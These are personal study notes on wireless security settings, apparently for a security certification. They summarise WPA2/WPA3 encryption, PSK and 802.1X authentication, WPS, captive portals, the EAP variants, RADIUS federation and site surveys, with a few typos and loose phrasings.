3.4 Wireless Security Settings

Wireless Cryptography

WPA2 uses CCMP block cipher mode

WPA3 uses GCMP block cipher mode - unique WPA3 session key is derived from the PSK using SAE (simultaneous authentication of equals) - WPA3-Enterprise is the same as WPA3-802.1X

Wireless Authentication Methods

Credentials shared password / pre-shared key (PSK) centralized authentication (802.1X)

802.1X authenticates users individually with an authentication server (i.e RADIUS, LDAP)

Captive portal = web page that users are presented with before they are granted broader access to network - provides authentication to a network - access table recognize lack of authentication

WPS (Wi-Fi Protected Setup) = allows easy setup of mobile device, rather than using PSK or 802.1X, it uses like a PIN number or push a button on the modem, or use Near-Field Communication (NFC) to connect

Wireless Authentication Protocols

Extensible authentication protocol (EAP) = authentication framework that allows for the use of different authentication methods for secure network access - EAP is not an authentication method like MS-CHAPv2, but a framework that enables networking vendors to develop and install new authentication methods, known as EAP methods

IEEE 802.1X = you don't get access to the network until you authenticate - used with RADIUS, LDAP, TACACS+ Supplicant - the client who wants to connect to the network Authenticator - typically a network switch or wireless access point that acts as a go-between from the supplicant to the authentication server. Authentication server - usually a RADIUS server that holds the credentials and makes the decision to allow or deny access to the supplicant.

EAP-FAST - secure tunneling with authentication server (AS) and supplicant share a protected access credential (PAC) - need a RADIUS server

PEAP - protected extensible authentication protocol - encapsulate EAP in a TLS tunnel - AS uses a digital certificate instead of a PAC - client doesn't use a certificate - user authenticates with MSCHAPv2 - authenticates to Microsoft's MS-CHAPv2 database - user can also authenticate with Generic Token Card (GTC) - hardware token generator

EAP-TLS - requires digital certificates on the AS and all other devices - TLS tunnel is built for user authentication process

EAP-TTLS = EAP tunneled transport layer security, you can tunnel different protocols within the same TLS tunnel - requires a digital certificate on the AS only, not for every device

RADIUS Federation - members of one organization can authenticate to the network of another organization - using gmail account to authenticate to other websites - commonly use 802.1X - EAP to authenticate

Installing Wireless Networks

Site survey = determining the existing wireless landspace - usually used with heat map which identifies wireless signal strengths

overlapping channels - frequency conflits, use non-overlapping channels